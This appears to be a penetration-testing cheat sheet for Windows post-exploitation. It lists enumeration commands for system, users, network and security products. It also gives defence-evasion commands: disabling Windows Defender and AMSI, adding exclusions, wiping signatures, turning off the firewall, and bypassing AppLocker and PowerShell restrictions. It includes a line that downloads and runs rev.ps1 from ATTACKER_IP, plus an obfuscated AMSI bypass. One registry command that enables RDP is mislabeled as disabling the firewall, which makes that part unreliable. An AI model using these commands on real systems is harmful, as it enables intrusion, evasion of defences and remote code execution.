Manual Enumeration
1. Windows Version and Configuration
Find installed patches, architecture, OS version:
systeminfo
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
Get exact OS version:
type C:/Windows/system32/eula.txt
Extract patchs and updates:
wmic qfe
Architecture:
wmic os get osarchitecture || echo %PROCESSOR_ARCHITECTURE%
List all env variables:
set
Get-ChildItemEnv: |ft Key,Value
List all drives:
wmic logicaldisk get caption || fsutil fsinfo drives
wmic logicaldisk get caption,description,providername
Get-PSDrive|where{$_.Provider-like"Microsoft.PowerShell.Core\FileSystem"}|ft Name,Root
2. User Enumeration
Hostname:
hostname
Get current username:
echo %USERNAME%|| whoami
env:username
echo %username%
> getuid
List user privilege:
whoami /priv
whoami /groups
List all users:
net user
net users
whoami /all
Get-LocalUser|ft Name,Enabled,LastLogon
Get-ChildItemC:\Users -Force |select Name
List logon requirements; useable for bruteforcing:
net accounts
Get details about a user (i.e. administrator, admin, current user):
net user administrator
net user admin
net user %USERNAME%
List all local groups:
net localgroup
Get-LocalGroup|ft Name
Get details about a group (i.e. administrators):
net group /domain
net group /domain {Group Name}
net localgroup administrators
Get-LocalGroupMemberAdministrators |ft Name,PrincipalSource
Get-LocalGroupMemberAdministrateurs |ft Name,PrincipalSource
Get Domain Controllers:
nltest /DCLIST:DomainName
nltest /DCNAME:DomainName
nltest /DSGETDC:DomainName
3. Network Enumeration
List all network interfaces, IP, and DNS:
ipconfig /all
Get-NetIPConfiguration|ft InterfaceAlias,InterfaceDescription,IPv4Address
Get-DnsClientServerAddress-AddressFamily IPv4 |ft
List current routing table:
route print
Get-NetRoute-AddressFamily IPv4 |ft DestinationPrefix,NextHop,RouteMetric,ifIndex
List the ARP table:
arp -A
Get-NetNeighbor-AddressFamily IPv4 |ft ifIndex,IPAddress,LinkLayerAddress,State
$ ipconfig /all & route print & arp -a
List all current connections:
netstat -ano
List open conections:
netstat -aton
List all network shares:
net share
powershell Find-DomainShare-ComputerDomain domain.local
SNMP Configuration:
reg query HKLM\SYSTEM\CurrentControlSet\Services\SNMP /s
Get-ChildItem-path HKLM:\SYSTEM\CurrentControlSet\Services\SNMP -Recurse
4. Antivirus & Detections
Enumerate antivirus on a box with WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
Windows Defender
Check status of Defender:
PS C:\> Get-MpComputerStatus
Disable scanning all downloaded files and attachments, disable AMSI (reactive):
PS C:\> Set-MpPreference -DisableRealtimeMonitoring $true; Get-MpComputerStatus
PS C:\> Set-MpPreference -DisableIOAVProtection $true
Disable AMSI (set to 0 to enable):
PS C:\> Set-MpPreference -DisableScriptScanning 1
Exclude a folder:
PS C:\> Add-MpPreference -ExclusionPath "C:\Temp"
PS C:\> Add-MpPreference -ExclusionPath "C:\Windows\Tasks"
PS C:\> Set-MpPreference -ExclusionProcess "word.exe", "vmwp.exe"
Remove signatures (if Internet connection is present, they will be downloaded again):
PS > & "C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\MpCmdRun.exe" -RemoveDefinitions -All
PS > & "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
Firewall
List firewall state and current configuration:
netsh advfirewall firewall dump
or
netsh firewall show state
netsh firewall show config
List firewall's blocked ports:
$f=New-object -comObject HNetCfg.FwPolicy2;$f.rules | where {$_.action -eq "0"} | select name,applicationname,localports
Disable firewall:
Disable Firewall on Windows 7 via cmd:
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
Disable Firewall on Windows 7 via Powershell:
powershell.exe -ExecutionPolicy Bypass -command 'Set-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Terminal Server" -Name "fDenyTSConnections" –Value'`
Disable Firewall on any windows via cmd:
netsh firewall set opmode disable
netsh Advfirewall set allprofiles state off
How well is the system secured?:
wmic qfe get Caption,Description,HotFixID,InstalledOn
AppLocker Enumeration
With the GPO (Group Policy Objects):
HKLM\SOFTWARE\Policies\Microsoft\Windows\SrpV2 (Keys: Appx, Dll, Exe, Msi and Script).
List AppLocker rules:
PowerView PS C:\>Get-AppLockerPolicy-Effective |select -ExpandProperty RuleCollections
AppLocker Bypass:
By default, C:\Windows is not blocked, and C:\Windows\Tasks is writtable by any users
https://github.com/api0cradle/UltimateAppLockerByPassList/blob/master/Generic-AppLockerbypasses.mdhttps://github.com/api0cradle/UltimateAppLockerByPassList/blob/master/VerifiedAppLockerBypasses.md
https://github.com/api0cradle/UltimateAppLockerByPassList/blob/master/DLL-Execution.md
Powershell
Default powershell locations in a Windows system:
C:\windows\syswow64\windowspowershell\v1.0\powershell
C:\Windows\System32\WindowsPowerShell\v1.0\powershell
Powershell Constrained Mode:
Check if we are in a constrained mode: $ExecutionContext.SessionState.LanguageMode
PowerShdll - Powershell with no Powershell.exe via DLL's: rundll32.exe C:\temp\PowerShdll.dll,main
Other bypasses:
PS > &{ whoami }
powershell.exe -v 2 -ep bypass -command "IEX (New-Object Net.WebClient).DownloadString('http://ATTACKER_IP/rev.ps1')"
AMSI Bypass (Antimalware Scan Interface)
Find more AMSI bypass: here
PS C:\> [Ref].Assembly.GetType('System.Management.Automation.Ams'+'iUtils').GetField('am'+'siInitFailed','NonPu'+'blic,Static').SetValue($null,$true)
Default Writable Folders
C:\Windows\System32\Microsoft\Crypto\RSA\MachineKeys
C:\Windows\System32\spool\drivers\color
C:\Windows\System32\spool\printers
C:\Windows\System32\spool\servers
C:\Windows\tracing
C:\Windows\Temp
C:\Users\Public
C:\Windows\Tasks
C:\Windows\System32\tasks
C:\Windows\SysWOW64\tasks
C:\Windows\System32\tasks_migrated\microsoft\windows\pls\system
C:\Windows\SysWOW64\tasks\microsoft\windows\pls\system
C:\Windows\debug\wia
C:\Windows\registration\crmlog
C:\Windows\System32\com\dmp
C:\Windows\SysWOW64\com\dmp
C:\Windows\System32\fxstmp
C:\Windows\SysWOW64\fxstmp
Last updated